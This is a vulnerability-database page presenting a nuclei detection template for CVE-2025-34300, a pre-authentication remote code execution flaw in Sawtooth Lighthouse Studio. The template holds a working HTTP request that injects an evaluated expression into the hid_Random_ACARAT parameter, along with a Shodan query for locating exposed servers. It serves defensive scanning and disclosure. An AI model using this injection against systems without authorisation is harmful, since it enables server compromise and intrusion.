Lucene search
K

SawtoothSoftware Lighthouse Studio < 9.16.14 - Pre-Auth Remote Code Execution

🗓️ 14 Jul 2026 07:07:24Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Critical remote code execution vulnerability in SawtoothSoftware Lighthouse Studio versions < 9.16.14

Related
Refs
Code
id: CVE-2025-34300

info:
  name: SawtoothSoftware Lighthouse Studio < 9.16.14 - Pre-Auth Remote Code Execution
  author: assetnote,DhiyaneshDK,iamnoooob
  severity: critical
  description: |
    A pre-authentication remote code execution vulnerability exists in Sawtooth Software’s Lighthouse Studio versions prior to 9.16.14. The issue arises from the unsafe use of the `eval` function within the Perl CGI component `ciwweb.pl`, where attacker-supplied input inside `hid_Random_ACARAT` is directly passed to `eval`. This allows remote unauthenticated attackers to execute arbitrary Perl code on the server.
  impact: |
    Unauthenticated attackers can execute arbitrary Perl code through the hid_Random_ACARAT parameter due to unsafe eval usage, achieving complete server compromise.
  remediation: |
    Upgrade to Sawtooth Software Lighthouse Studio version 9.16.14 or later that removes unsafe eval usage in ciwweb.pl.
  reference:
    - https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/
    - https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34300
  classification:
    epss-score: 0.4942
    epss-percentile: 0.98757
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-34300
    cwe-id: CWE-1336,CWE-20
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Lighthouse Studio"
  tags: cve,cve2025,lighthouse-studio,sawtoothsoftware,rce,ssti,vkev,vuln

variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - raw:
      - |
        GET /cgi-bin/ciwweb.pl?hid_javascript=1&hid_Random_ACARAT=[%25{{num1}}*{{num2}}%25]&hid_Random_ACARAT=x HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'name="hid_Random_ACARAT" value="{{result}}"'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c1a79ca231f27cc3576b092089e8c0f56d38850d753b952824fc45551086bfd3022100cfacd2a7b902d990a5d94139dfe8bcd8d05690dd7ca651b3366a7992a8c9e44f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 410
EPSS0.4942
SSVC
25